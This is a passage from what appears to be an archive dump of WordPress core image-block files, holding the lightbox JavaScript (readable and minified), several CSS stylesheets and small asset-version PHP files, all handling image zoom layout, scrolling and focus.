      // On mobile devices, prevents triggering the scroll event because
      // otherwise the page jumps around when it resets the scroll position.
      // This also means that closing the lightbox requires that a user
      // perform a simple tap. This may be changed in the future if there is a
      // better alternative to override or reset the scroll position during
      // swipe actions.
      if (state.overlayEnabled) {
        event.preventDefault();
      }
    },
    handleTouchStart() {
      isTouching = true;
    },
    handleTouchEnd() {
      // Waits a few milliseconds before resetting to ensure that pinch to
      // zoom works consistently on mobile devices when the lightbox is open.
      lastTouchTime = Date.now();
      isTouching = false;
    },
    handleScroll() {
      // Prevents scrolling behaviors that trigger content shift while the
      // lightbox is open. It would be better to accomplish through CSS alone,
      // but using overflow: hidden is currently the only way to do so and
      // that causes a layout to shift and prevents the zoom animation from
      // working in some cases because it's not possible to account for the
      // layout shift when doing the animation calculations. Instead, it uses
      // JavaScript to prevent and reset the scrolling behavior.
      if (state.overlayOpened) {
        // Avoids overriding the scroll behavior on mobile devices because
        // doing so breaks the pinch to zoom functionality, and users should
        // be able to zoom in further on the high-res image.
        if (!isTouching && Date.now() - lastTouchTime > 450) {
          // It doesn't rely on `event.preventDefault()` to prevent scrolling
          // because the scroll event can't be canceled, so it resets the
          // position instead.
          window.scrollTo(state.scrollLeftReset, state.scrollTopReset);
        }
      }
    }
  },
  callbacks: {
    setOverlayStyles() {
      if (!imageRef) {
        return;
      }
      let {
        naturalWidth,
        naturalHeight,
        offsetWidth: originalWidth,
        offsetHeight: originalHeight
      } = imageRef;
      let {
        x: screenPosX,
        y: screenPosY
      } = imageRef.getBoundingClientRect();

      // Natural ratio of the image clicked to open the lightbox.
      const naturalRatio = naturalWidth / naturalHeight;
      // Original ratio of the image clicked to open the lightbox.
      let originalRatio = originalWidth / originalHeight;

      // If it has object-fit: contain, recalculates the original sizes
      // and the screen position without the blank spaces.
      if (state.currentImage.scaleAttr === 'contain') {
        if (naturalRatio > originalRatio) {
          const heightWithoutSpace = originalWidth / naturalRatio;
          // Recalculates screen position without the top space.
          screenPosY += (originalHeight - heightWithoutSpace) / 2;
          originalHeight = heightWithoutSpace;
        } else {
          const widthWithoutSpace = originalHeight * naturalRatio;
          // Recalculates screen position without the left space.
          screenPosX += (originalWidth - widthWithoutSpace) / 2;
          originalWidth = widthWithoutSpace;
        }
      }
      originalRatio = originalWidth / originalHeight;

      // Typically, it uses the image's full-sized dimensions. If those
      // dimensions have not been set (i.e. an external image with only one
      // size), the image's dimensions in the lightbox are the same
      // as those of the image in the content.
      let imgMaxWidth = parseFloat(state.currentImage.targetWidth !== 'none' ? state.currentImage.targetWidth : naturalWidth);
      let imgMaxHeight = parseFloat(state.currentImage.targetHeight !== 'none' ? state.currentImage.targetHeight : naturalHeight);

      // Ratio of the biggest image stored in the database.
      let imgRatio = imgMaxWidth / imgMaxHeight;
      let containerMaxWidth = imgMaxWidth;
      let containerMaxHeight = imgMaxHeight;
      let containerWidth = imgMaxWidth;
      let containerHeight = imgMaxHeight;
      // Checks if the target image has a different ratio than the original
      // one (thumbnail). Recalculates the width and height.
      if (naturalRatio.toFixed(2) !== imgRatio.toFixed(2)) {
        if (naturalRatio > imgRatio) {
          // If the width is reached before the height, it keeps the maxWidth
          // and recalculates the height unless the difference between the
          // maxHeight and the reducedHeight is higher than the maxWidth,
          // where it keeps the reducedHeight and recalculate the width.
          const reducedHeight = imgMaxWidth / naturalRatio;
          if (imgMaxHeight - reducedHeight > imgMaxWidth) {
            imgMaxHeight = reducedHeight;
            imgMaxWidth = reducedHeight * naturalRatio;
          } else {
            imgMaxHeight = imgMaxWidth / naturalRatio;
          }
        } else {
          // If the height is reached before the width, it keeps the maxHeight
          // and recalculate the width unlesss the difference between the
          // maxWidth and the reducedWidth is higher than the maxHeight, where
          // it keeps the reducedWidth and recalculate the height.
          const reducedWidth = imgMaxHeight * naturalRatio;
          if (imgMaxWidth - reducedWidth > imgMaxHeight) {
            imgMaxWidth = reducedWidth;
            imgMaxHeight = reducedWidth / naturalRatio;
          } else {
            imgMaxWidth = imgMaxHeight * naturalRatio;
          }
        }
        containerWidth = imgMaxWidth;
        containerHeight = imgMaxHeight;
        imgRatio = imgMaxWidth / imgMaxHeight;

        // Calculates the max size of the container.
        if (originalRatio > imgRatio) {
          containerMaxWidth = imgMaxWidth;
          containerMaxHeight = containerMaxWidth / originalRatio;
        } else {
          containerMaxHeight = imgMaxHeight;
          containerMaxWidth = containerMaxHeight * originalRatio;
        }
      }

      // If the image has been pixelated on purpose, it keeps that size.
      if (originalWidth > containerWidth || originalHeight > containerHeight) {
        containerWidth = originalWidth;
        containerHeight = originalHeight;
      }

      // Calculates the final lightbox image size and the scale factor.
      // MaxWidth is either the window container (accounting for padding) or
      // the image resolution.
      let horizontalPadding = 0;
      if (window.innerWidth > 480) {
        horizontalPadding = 80;
      } else if (window.innerWidth > 1920) {
        horizontalPadding = 160;
      }
      const verticalPadding = 80;
      const targetMaxWidth = Math.min(window.innerWidth - horizontalPadding, containerWidth);
      const targetMaxHeight = Math.min(window.innerHeight - verticalPadding, containerHeight);
      const targetContainerRatio = targetMaxWidth / targetMaxHeight;
      if (originalRatio > targetContainerRatio) {
        // If targetMaxWidth is reached before targetMaxHeight.
        containerWidth = targetMaxWidth;
        containerHeight = containerWidth / originalRatio;
      } else {
        // If targetMaxHeight is reached before targetMaxWidth.
        containerHeight = targetMaxHeight;
        containerWidth = containerHeight * originalRatio;
      }
      const containerScale = originalWidth / containerWidth;
      const lightboxImgWidth = imgMaxWidth * (containerWidth / containerMaxWidth);
      const lightboxImgHeight = imgMaxHeight * (containerHeight / containerMaxHeight);

      // As of this writing, using the calculations above will render the
      // lightbox with a small, erroneous whitespace on the left side of the
      // image in iOS Safari, perhaps due to an inconsistency in how browsers
      // handle absolute positioning and CSS transformation. In any case,
      // adding 1 pixel to the container width and height solves the problem,
      // though this can be removed if the issue is fixed in the future.
      state.overlayStyles = `
				:root {
					--wp--lightbox-initial-top-position: ${screenPosY}px;
					--wp--lightbox-initial-left-position: ${screenPosX}px;
					--wp--lightbox-container-width: ${containerWidth + 1}px;
					--wp--lightbox-container-height: ${containerHeight + 1}px;
					--wp--lightbox-image-width: ${lightboxImgWidth}px;
					--wp--lightbox-image-height: ${lightboxImgHeight}px;
					--wp--lightbox-scale: ${containerScale};
					--wp--lightbox-scrollbar-width: ${window.innerWidth - document.documentElement.clientWidth}px;
				}
			`;
    },
    setButtonStyles() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      ctx.imageRef = ref;
      const {
        naturalWidth,
        naturalHeight,
        offsetWidth,
        offsetHeight
      } = ref;

      // If the image isn't loaded yet, it can't calculate where the button
      // should be.
      if (naturalWidth === 0 || naturalHeight === 0) {
        return;
      }
      const figure = ref.parentElement;
      const figureWidth = ref.parentElement.clientWidth;

      // It needs special handling for the height because a caption will cause
      // the figure to be taller than the image, which means it needs to
      // account for that when calculating the placement of the button in the
      // top right corner of the image.
      let figureHeight = ref.parentElement.clientHeight;
      const caption = figure.querySelector('figcaption');
      if (caption) {
        const captionComputedStyle = window.getComputedStyle(caption);
        if (!['absolute', 'fixed'].includes(captionComputedStyle.position)) {
          figureHeight = figureHeight - caption.offsetHeight - parseFloat(captionComputedStyle.marginTop) - parseFloat(captionComputedStyle.marginBottom);
        }
      }
      const buttonOffsetTop = figureHeight - offsetHeight;
      const buttonOffsetRight = figureWidth - offsetWidth;

      // In the case of an image with object-fit: contain, the size of the
      // <img> element can be larger than the image itself, so it needs to
      // calculate where to place the button.
      if (ctx.scaleAttr === 'contain') {
        // Natural ratio of the image.
        const naturalRatio = naturalWidth / naturalHeight;
        // Offset ratio of the image.
        const offsetRatio = offsetWidth / offsetHeight;
        if (naturalRatio >= offsetRatio) {
          // If it reaches the width first, it keeps the width and compute the
          // height.
          const referenceHeight = offsetWidth / naturalRatio;
          ctx.imageButtonTop = (offsetHeight - referenceHeight) / 2 + buttonOffsetTop + 16;
          ctx.imageButtonRight = buttonOffsetRight + 16;
        } else {
          // If it reaches the height first, it keeps the height and compute
          // the width.
          const referenceWidth = offsetHeight * naturalRatio;
          ctx.imageButtonTop = buttonOffsetTop + 16;
          ctx.imageButtonRight = (offsetWidth - referenceWidth) / 2 + buttonOffsetRight + 16;
        }
      } else {
        ctx.imageButtonTop = buttonOffsetTop + 16;
        ctx.imageButtonRight = buttonOffsetRight + 16;
      }
    },
    setOverlayFocus() {
      if (state.overlayEnabled) {
        // Moves the focus to the dialog when it opens.
        const {
          ref
        } = (0,interactivity_namespaceObject.getElement)();
        ref.focus();
      }
    },
    initTriggerButton() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      ctx.buttonRef = ref;
    }
  }
}, {
  lock: true
});

image/style.min.css000060400000014326151330427370010271 0ustar00.wp-block-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom}.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{border-radius:inherit}.wp-block-image.has-custom-border img{box-sizing:border-box}.wp-block-image.aligncenter{text-align:center}.wp-block-image.alignfull img,.wp-block-image.alignwide img{height:auto;width:100%}.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{display:table}.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{caption-side:bottom;display:table-caption}.wp-block-image .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-image .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-image .aligncenter{margin-left:auto;margin-right:auto}.wp-block-image :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-image.is-style-circle-mask img{border-radius:9999px}@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){.wp-block-image.is-style-circle-mask img{border-radius:0;-webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');mask-mode:alpha;-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain}}:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){border-radius:9999px}.wp-block-image figure{margin:0}.wp-lightbox-container{display:flex;flex-direction:column;position:relative}.wp-lightbox-container img{cursor:zoom-in}.wp-lightbox-container img:hover+button{opacity:1}.wp-lightbox-container button{align-items:center;-webkit-backdrop-filter:blur(16px) saturate(180%);backdrop-filter:blur(16px) saturate(180%);background-color:#5a5a5a40;border:none;border-radius:4px;cursor:zoom-in;display:flex;height:20px;justify-content:center;opacity:0;padding:0;position:absolute;right:16px;text-align:center;top:16px;transition:opacity .2s ease;width:20px;z-index:100}.wp-lightbox-container button:focus-visible{outline:3px auto #5a5a5a40;outline:3px auto -webkit-focus-ring-color;outline-offset:3px}.wp-lightbox-container button:hover{cursor:pointer;opacity:1}.wp-lightbox-container button:focus{opacity:1}.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){background-color:#5a5a5a40;border:none}.wp-lightbox-overlay{box-sizing:border-box;cursor:zoom-out;height:100vh;left:0;overflow:hidden;position:fixed;top:0;visibility:hidden;width:100%;z-index:100000}.wp-lightbox-overlay .close-button{align-items:center;cursor:pointer;display:flex;justify-content:center;min-height:40px;min-width:40px;padding:0;position:absolute;right:calc(env(safe-area-inset-right) + 16px);top:calc(env(safe-area-inset-top) + 16px);z-index:5000000}.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){background:none;border:none}.wp-lightbox-overlay .lightbox-image-container{height:var(--wp--lightbox-container-height);left:50%;overflow:hidden;position:absolute;top:50%;transform:translate(-50%,-50%);transform-origin:top left;width:var(--wp--lightbox-container-width);z-index:9999999999}.wp-lightbox-overlay .wp-block-image{align-items:center;box-sizing:border-box;display:flex;height:100%;justify-content:center;margin:0;position:relative;transform-origin:0 0;width:100%;z-index:3000000}.wp-lightbox-overlay .wp-block-image img{height:var(--wp--lightbox-image-height);min-height:var(--wp--lightbox-image-height);min-width:var(--wp--lightbox-image-width);width:var(--wp--lightbox-image-width)}.wp-lightbox-overlay .wp-block-image figcaption{display:none}.wp-lightbox-overlay button{background:none;border:none}.wp-lightbox-overlay .scrim{background-color:#fff;height:100%;opacity:.9;position:absolute;width:100%;z-index:2000000}.wp-lightbox-overlay.active{animation:turn-on-visibility .25s both;visibility:visible}.wp-lightbox-overlay.active img{animation:turn-on-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active){animation:turn-off-visibility .35s both}.wp-lightbox-overlay.show-closing-animation:not(.active) img{animation:turn-off-visibility .25s both}@media (prefers-reduced-motion:no-preference){.wp-lightbox-overlay.zoom.active{animation:none;opacity:1;visibility:visible}.wp-lightbox-overlay.zoom.active .lightbox-image-container{animation:lightbox-zoom-in .4s}.wp-lightbox-overlay.zoom.active .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.active .scrim{animation:turn-on-visibility .4s forwards}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active){animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container{animation:lightbox-zoom-out .4s}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .lightbox-image-container img{animation:none}.wp-lightbox-overlay.zoom.show-closing-animation:not(.active) .scrim{animation:turn-off-visibility .4s forwards}}@keyframes turn-on-visibility{0%{opacity:0}to{opacity:1}}@keyframes turn-off-visibility{0%{opacity:1;visibility:visible}99%{opacity:0;visibility:visible}to{opacity:0;visibility:hidden}}@keyframes lightbox-zoom-in{0%{transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale))}to{transform:translate(-50%,-50%) scale(1)}}@keyframes lightbox-zoom-out{0%{transform:translate(-50%,-50%) scale(1);visibility:visible}99%{visibility:visible}to{transform:translate(calc((-100vw + var(--wp--lightbox-scrollbar-width))/2 + var(--wp--lightbox-initial-left-position)),calc(-50vh + var(--wp--lightbox-initial-top-position))) scale(var(--wp--lightbox-scale));visibility:hidden}}image/editor.min.css000060400000005512151330427370010414 0ustar00.wp-block-image.wp-block-image.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;filter:none!important}.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{opacity:0}.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-image.wp-block-image .block-bindings-media-placeholder-message,.wp-block-image.wp-block-image.is-selected .components-placeholder:before{opacity:0}.wp-block-image.wp-block-image.is-selected .block-bindings-media-placeholder-message{opacity:1}.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{transition:none}figure.wp-block-image:not(.wp-block){margin:0}.wp-block-image{position:relative}.wp-block-image .is-applying img,.wp-block-image.is-transient img{opacity:.3}.wp-block-image figcaption img{display:inline}.wp-block-image .components-spinner{left:50%;position:absolute;top:50%;transform:translate(-50%,-50%)}.wp-block-image .components-resizable-box__container{display:table}.wp-block-image .components-resizable-box__container img{display:block;height:inherit;width:inherit}.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{left:0;margin:-1px 0;position:absolute;right:0}@media (min-width:600px){.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{margin:-1px}}[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{height:auto;width:100%}.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{display:table}.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{caption-side:bottom;display:table-caption}.wp-block[data-align=left]>.wp-block-image{margin:.5em 1em .5em 0}.wp-block[data-align=right]>.wp-block-image{margin:.5em 0 .5em 1em}.wp-block[data-align=center]>.wp-block-image{margin-left:auto;margin-right:auto;text-align:center}.wp-block-image__crop-area{max-width:100%;overflow:hidden;position:relative;width:100%}.wp-block-image__crop-area .reactEasyCrop_Container{pointer-events:auto}.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{border:none;border-radius:0}.wp-block-image__crop-icon{align-items:center;display:flex;justify-content:center;min-width:48px;padding:0 8px}.wp-block-image__crop-icon svg{fill:currentColor}.wp-block-image__zoom .components-popover__content{min-width:260px;overflow:visible!important}.wp-block-image__toolbar_content_textarea{width:250px}image/editor.css000060400000006127151330427370007635 0ustar00.wp-block-image.wp-block-image.is-selected .components-placeholder{
  background-color:#fff;
  border:none;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  color:#1e1e1e;
  filter:none !important;
}
.wp-block-image.wp-block-image.is-selected .components-placeholder>svg{
  opacity:0;
}
.wp-block-image.wp-block-image.is-selected .components-placeholder .components-placeholder__illustration{
  display:none;
}
.wp-block-image.wp-block-image .block-bindings-media-placeholder-message,.wp-block-image.wp-block-image.is-selected .components-placeholder:before{
  opacity:0;
}
.wp-block-image.wp-block-image.is-selected .block-bindings-media-placeholder-message{
  opacity:1;
}
.wp-block-image.wp-block-image .components-button,.wp-block-image.wp-block-image .components-placeholder__instructions,.wp-block-image.wp-block-image .components-placeholder__label{
  transition:none;
}

figure.wp-block-image:not(.wp-block){
  margin:0;
}

.wp-block-image{
  position:relative;
}
.wp-block-image .is-applying img,.wp-block-image.is-transient img{
  opacity:.3;
}
.wp-block-image figcaption img{
  display:inline;
}
.wp-block-image .components-spinner{
  left:50%;
  position:absolute;
  top:50%;
  transform:translate(-50%, -50%);
}

.wp-block-image .components-resizable-box__container{
  display:table;
}
.wp-block-image .components-resizable-box__container img{
  display:block;
  height:inherit;
  width:inherit;
}

.block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{
  left:0;
  margin:-1px 0;
  position:absolute;
  right:0;
}
@media (min-width:600px){
  .block-editor-block-list__block[data-type="core/image"] .block-editor-block-toolbar .block-editor-url-input__button-modal{
    margin:-1px;
  }
}

[data-align=full]>.wp-block-image img,[data-align=wide]>.wp-block-image img{
  height:auto;
  width:100%;
}

.wp-block[data-align=center]>.wp-block-image,.wp-block[data-align=left]>.wp-block-image,.wp-block[data-align=right]>.wp-block-image{
  display:table;
}
.wp-block[data-align=center]>.wp-block-image>figcaption,.wp-block[data-align=left]>.wp-block-image>figcaption,.wp-block[data-align=right]>.wp-block-image>figcaption{
  caption-side:bottom;
  display:table-caption;
}

.wp-block[data-align=left]>.wp-block-image{
  margin:.5em 1em .5em 0;
}

.wp-block[data-align=right]>.wp-block-image{
  margin:.5em 0 .5em 1em;
}

.wp-block[data-align=center]>.wp-block-image{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

.wp-block-image__crop-area{
  max-width:100%;
  overflow:hidden;
  position:relative;
  width:100%;
}
.wp-block-image__crop-area .reactEasyCrop_Container{
  pointer-events:auto;
}
.wp-block-image__crop-area .reactEasyCrop_Container .reactEasyCrop_Image{
  border:none;
  border-radius:0;
}

.wp-block-image__crop-icon{
  align-items:center;
  display:flex;
  justify-content:center;
  min-width:48px;
  padding:0 8px;
}
.wp-block-image__crop-icon svg{
  fill:currentColor;
}

.wp-block-image__zoom .components-popover__content{
  min-width:260px;
  overflow:visible !important;
}

.wp-block-image__toolbar_content_textarea{
  width:250px;
}image/view.min.js000060400000007570151330427370007732 0ustar00import*as t from"@wordpress/interactivity";var e={d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e)};const n=(t=>{var n={};return e.d(n,t),n})({getContext:()=>t.getContext,getElement:()=>t.getElement,store:()=>t.store});let o,r,i=!1,l=0;const{state:a,actions:c,callbacks:s}=(0,n.store)("core/image",{state:{currentImage:{},get overlayOpened(){return a.currentImage.currentSrc},get roleAttribute(){return a.overlayOpened?"dialog":null},get ariaModal(){return a.overlayOpened?"true":null},get enlargedSrc(){return a.currentImage.uploadedSrc||"data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs="},get imgStyles(){return a.overlayOpened&&`${a.currentImage.imgStyles?.replace(/;$/,"")}; object-fit:cover;`}},actions:{showLightbox(){const t=(0,n.getContext)();t.imageRef?.complete&&(a.scrollTopReset=document.documentElement.scrollTop,a.scrollLeftReset=document.documentElement.scrollLeft,t.currentSrc=t.imageRef.currentSrc,o=t.imageRef,r=t.buttonRef,a.currentImage=t,a.overlayEnabled=!0,s.setOverlayStyles())},hideLightbox(){a.overlayEnabled&&(setTimeout((function(){r.focus({preventScroll:!0}),a.currentImage={},o=null,r=null}),450),a.showClosingAnimation=!0,a.overlayEnabled=!1)},handleKeydown(t){if(a.overlayEnabled){if("Tab"===t.key){t.preventDefault();const{ref:e}=(0,n.getElement)();e.querySelector("button").focus()}"Escape"===t.key&&c.hideLightbox()}},handleTouchMove(t){a.overlayEnabled&&t.preventDefault()},handleTouchStart(){i=!0},handleTouchEnd(){l=Date.now(),i=!1},handleScroll(){a.overlayOpened&&!i&&Date.now()-l>450&&window.scrollTo(a.scrollLeftReset,a.scrollTopReset)}},callbacks:{setOverlayStyles(){if(!o)return;let{naturalWidth:t,naturalHeight:e,offsetWidth:n,offsetHeight:r}=o,{x:i,y:l}=o.getBoundingClientRect();const c=t/e;let s=n/r;if("contain"===a.currentImage.scaleAttr)if(c>s){const t=n/c;l+=(r-t)/2,r=t}else{const t=r*c;i+=(n-t)/2,n=t}s=n/r;let g=parseFloat("none"!==a.currentImage.targetWidth?a.currentImage.targetWidth:t),u=parseFloat("none"!==a.currentImage.targetHeight?a.currentImage.targetHeight:e),d=g/u,h=g,m=u,p=g,f=u;if(c.toFixed(2)!==d.toFixed(2)){if(c>d){const t=g/c;u-t>g?(u=t,g=t*c):u=g/c}else{const t=u*c;g-t>u?(g=t,u=t/c):g=u*c}p=g,f=u,d=g/u,s>d?(h=g,m=h/s):(m=u,h=m*s)}(n>p||r>f)&&(p=n,f=r);let w=0;window.innerWidth>480?w=80:window.innerWidth>1920&&(w=160);const y=Math.min(window.innerWidth-w,p),b=Math.min(window.innerHeight-80,f);s>y/b?(p=y,f=p/s):(f=b,p=f*s);const x=n/p,v=g*(p/h),A=u*(f/m);a.overlayStyles=`\n\t\t\t\t:root {\n\t\t\t\t\t--wp--lightbox-initial-top-position: ${l}px;\n\t\t\t\t\t--wp--lightbox-initial-left-position: ${i}px;\n\t\t\t\t\t--wp--lightbox-container-width: ${p+1}px;\n\t\t\t\t\t--wp--lightbox-container-height: ${f+1}px;\n\t\t\t\t\t--wp--lightbox-image-width: ${v}px;\n\t\t\t\t\t--wp--lightbox-image-height: ${A}px;\n\t\t\t\t\t--wp--lightbox-scale: ${x};\n\t\t\t\t\t--wp--lightbox-scrollbar-width: ${window.innerWidth-document.documentElement.clientWidth}px;\n\t\t\t\t}\n\t\t\t`},setButtonStyles(){const t=(0,n.getContext)(),{ref:e}=(0,n.getElement)();t.imageRef=e;const{naturalWidth:o,naturalHeight:r,offsetWidth:i,offsetHeight:l}=e;if(0===o||0===r)return;const a=e.parentElement,c=e.parentElement.clientWidth;let s=e.parentElement.clientHeight;const g=a.querySelector("figcaption");if(g){const t=window.getComputedStyle(g);["absolute","fixed"].includes(t.position)||(s=s-g.offsetHeight-parseFloat(t.marginTop)-parseFloat(t.marginBottom))}const u=s-l,d=c-i;if("contain"===t.scaleAttr){const e=o/r;if(e>=i/l){const n=i/e;t.imageButtonTop=(l-n)/2+u+16,t.imageButtonRight=d+16}else{const n=l*e;t.imageButtonTop=u+16,t.imageButtonRight=(i-n)/2+d+16}}else t.imageButtonTop=u+16,t.imageButtonRight=d+16},setOverlayFocus(){if(a.overlayEnabled){const{ref:t}=(0,n.getElement)();t.focus()}},initTriggerButton(){const t=(0,n.getContext)(),{ref:e}=(0,n.getElement)();t.buttonRef=e}}},{lock:!0});image/theme.min.css000060400000000274151330427370010230 0ustar00:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}image/view.asset.php000060400000000124151330427370010425 0ustar00<?php return array('dependencies' => array(), 'version' => '7500eb032759d407a71d');
image/view.min.asset.php000060400000000124151330427370011207 0ustar00<?php return array('dependencies' => array(), 'version' => 'ff354d5368d64857fef0');
image/theme-rtl.min.css000060400000000274151330427370011027 0ustar00:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}image/style.css000060400000016011151330427370007500 0ustar00.wp-block-image img{
  box-sizing:border-box;
  height:auto;
  max-width:100%;
  vertical-align:bottom;
}
.wp-block-image[style*=border-radius] img,.wp-block-image[style*=border-radius]>a{
  border-radius:inherit;
}
.wp-block-image.has-custom-border img{
  box-sizing:border-box;
}
.wp-block-image.aligncenter{
  text-align:center;
}
.wp-block-image.alignfull img,.wp-block-image.alignwide img{
  height:auto;
  width:100%;
}
.wp-block-image .aligncenter,.wp-block-image .alignleft,.wp-block-image .alignright,.wp-block-image.aligncenter,.wp-block-image.alignleft,.wp-block-image.alignright{
  display:table;
}
.wp-block-image .aligncenter>figcaption,.wp-block-image .alignleft>figcaption,.wp-block-image .alignright>figcaption,.wp-block-image.aligncenter>figcaption,.wp-block-image.alignleft>figcaption,.wp-block-image.alignright>figcaption{
  caption-side:bottom;
  display:table-caption;
}
.wp-block-image .alignleft{
  float:left;
  margin:.5em 1em .5em 0;
}
.wp-block-image .alignright{
  float:right;
  margin:.5em 0 .5em 1em;
}
.wp-block-image .aligncenter{
  margin-left:auto;
  margin-right:auto;
}
.wp-block-image :where(figcaption){
  margin-bottom:1em;
  margin-top:.5em;
}
.wp-block-image.is-style-circle-mask img{
  border-radius:9999px;
}
@supports ((-webkit-mask-image:none) or (mask-image:none)) or (-webkit-mask-image:none){
  .wp-block-image.is-style-circle-mask img{
    border-radius:0;
    -webkit-mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');
            mask-image:url('data:image/svg+xml;utf8,<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="50"/></svg>');
    mask-mode:alpha;
    -webkit-mask-position:center;
            mask-position:center;
    -webkit-mask-repeat:no-repeat;
            mask-repeat:no-repeat;
    -webkit-mask-size:contain;
            mask-size:contain;
  }
}

:root :where(.wp-block-image.is-style-rounded img,.wp-block-image .is-style-rounded img){
  border-radius:9999px;
}

.wp-block-image figure{
  margin:0;
}

.wp-lightbox-container{
  display:flex;
  flex-direction:column;
  position:relative;
}
.wp-lightbox-container img{
  cursor:zoom-in;
}
.wp-lightbox-container img:hover+button{
  opacity:1;
}
.wp-lightbox-container button{
  align-items:center;
  -webkit-backdrop-filter:blur(16px) saturate(180%);
          backdrop-filter:blur(16px) saturate(180%);
  background-color:#5a5a5a40;
  border:none;
  border-radius:4px;
  cursor:zoom-in;
  display:flex;
  height:20px;
  justify-content:center;
  opacity:0;
  padding:0;
  position:absolute;
  right:16px;
  text-align:center;
  top:16px;
  transition:opacity .2s ease;
  width:20px;
  z-index:100;
}
.wp-lightbox-container button:focus-visible{
  outline:3px auto #5a5a5a40;
  outline:3px auto -webkit-focus-ring-color;
  outline-offset:3px;
}
.wp-lightbox-container button:hover{
  cursor:pointer;
  opacity:1;
}
.wp-lightbox-container button:focus{
  opacity:1;
}
.wp-lightbox-container button:focus,.wp-lightbox-container button:hover,.wp-lightbox-container button:not(:hover):not(:active):not(.has-background){
  background-color:#5a5a5a40;
  border:none;
}

.wp-lightbox-overlay{
  box-sizing:border-box;
  cursor:zoom-out;
  height:100vh;
  left:0;
  overflow:hidden;
  position:fixed;
  top:0;
  visibility:hidden;
  width:100%;
  z-index:100000;
}
.wp-lightbox-overlay .close-button{
  align-items:center;
  cursor:pointer;
  display:flex;
  justify-content:center;
  min-height:40px;
  min-width:40px;
  padding:0;
  position:absolute;
  right:calc(env(safe-area-inset-right) + 16px);
  top:calc(env(safe-area-inset-top) + 16px);
  z-index:5000000;
}
.wp-lightbox-overlay .close-button:focus,.wp-lightbox-overlay .close-button:hover,.wp-lightbox-overlay .close-button:not(:hover):not(:active):not(.has-background){
  background:none;
  border:none;
}
.wp-lightbox-overlay .lightbox-image-container{
  height:var(--wp--lightbox-container-height);
  left:50%;
  overflow:hidden;
  position:absolute;
  top:50%;
  transform:translate(-50%, -50%);
  transform-origin:top left;
  width:var(--wp--lightbox-container-width);
  z-index:9999999999;
}
.wp-lightbox-overlay .wp-block-image{
  align-items:center;
  box-sizing:border-box;
  display:flex;
  height:100%;
  justify-content:center;
  margin:0;
  position:relative;
  transform-origin:0 0;
  width:100%;
  z-index:3000000;
}
.wp-lightbox-overlay .wp-block-image img{
